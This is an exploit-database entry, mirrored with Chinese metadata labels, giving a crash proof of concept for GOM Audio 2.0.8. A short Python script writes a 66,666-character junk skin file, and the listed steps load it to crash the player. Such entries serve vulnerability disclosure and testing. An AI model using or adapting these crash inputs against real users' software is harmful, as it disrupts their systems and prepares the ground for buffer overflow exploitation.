GOM Audio 2.0.8 – ‘.gas’ Crash (PoC)

  • 作者: Un_N0n
    日期: 2015-08-24
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/37957/
  • ********************************************************************************************
    # Exploit Title: GOM Audio 2.0.8 Crash POC
    # Date: 8/24/2015
    # Exploit Author: Un_N0n
    # Software Vendor : http://audio.gomlab.com/
    # Software Link: http://audio.gomlab.com/download_log.gom
    # Version: 2.0.8 (2015/06/17)
    # Tested on: Windows 7 x86(32 BIT)
    ********************************************************************************************
    
    [Steps to Produce the Crash]:
    1- open 'Goma.exe'.
    2- Goto Preference -> Manage -> Skins.
    3- Click on ADD, Browse CRASH.gas in it.
    ~ Software will Crash.
    
    [Code to produce crash.txt]: 
    junk = "A"*66666
    file = open("CRASH.gas",'w')
    file.write(junk)
    file.close()
    **********************************************************************************************